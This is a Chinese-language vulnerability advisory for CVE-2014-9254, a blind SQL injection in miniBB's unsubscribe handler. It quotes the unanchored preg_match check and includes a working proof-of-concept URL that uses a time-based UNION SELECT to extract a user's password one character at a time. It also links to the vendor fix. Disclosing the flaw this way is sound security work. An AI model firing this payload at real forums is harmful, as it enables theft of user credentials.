内容安全 
大数据安全 
网络安全 
更多产品 
miniBB "code" SQL注入漏洞
发表日期:2014-12-25 16:18:04
miniBB "code" SQL注入漏洞
CVE-ID:CVE-2014-9254
发布日期:2014-12-19
更新日期:2014-12-22
受影响系统:
MiniBB MiniBB < 3.1
详细信息:
MiniBB是独立的、开源的网络论坛构造程序。
MiniBB 3.1之前版本,当"action"设置为"unsubscribe"后,没有正确过滤bb_func_unsub.php的"code"参数值,攻击者通过注入任意SQL代码,利用此漏洞可操纵SQL查询。
来源:
Kacper Szurek
参考信息:
http://secunia.com/advisories/61794/
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps
1. Description
preg_match() only check if $_GET[\'code\'] contains at least one letter or digit (missing ^ and $ inside regexp).
File: bb_func_unsub.php
$usrid=(isset($_GET[\'usrid\'])?$_GET[\'usrid\']+0:0);
$allowUnsub=FALSE;
$chkCode=FALSE;
if(isset($_GET[\'code\']) and preg_match("#[a-zA-Z0-9]+#", $_GET[\'code\'])){
//trying to unsubscribe directly from email
$chkField=\'email_code\';
$chkVal=$_GET[\'code\'];
$userCondition=TRUE;
$chkCode=TRUE;
}
else{
//manual unsubsribe
$chkField=\'user_id\';
$chkVal=$user_id;
$userCondition=($usrid==$user_id);
}
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, \'id, user_id\', \'topic_id\', \'=\', $topic, \'\', \'\', $chkField, \'=\', $chkVal))
http://security.szurek.pl/minibb-31-blind-sql-injection.html
2. Proof of Concept
http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test\' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != \'
This SQL will check if first password character user ID=1 is “c”.
If yes, it will sleep 5 seconds.
3. Solution:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
解决办法:
厂商补丁:
MiniBB
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
MiniBB:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
Kacper Szurek:
http://security.szurek.pl/minibb-31-blind-sql-injection.html
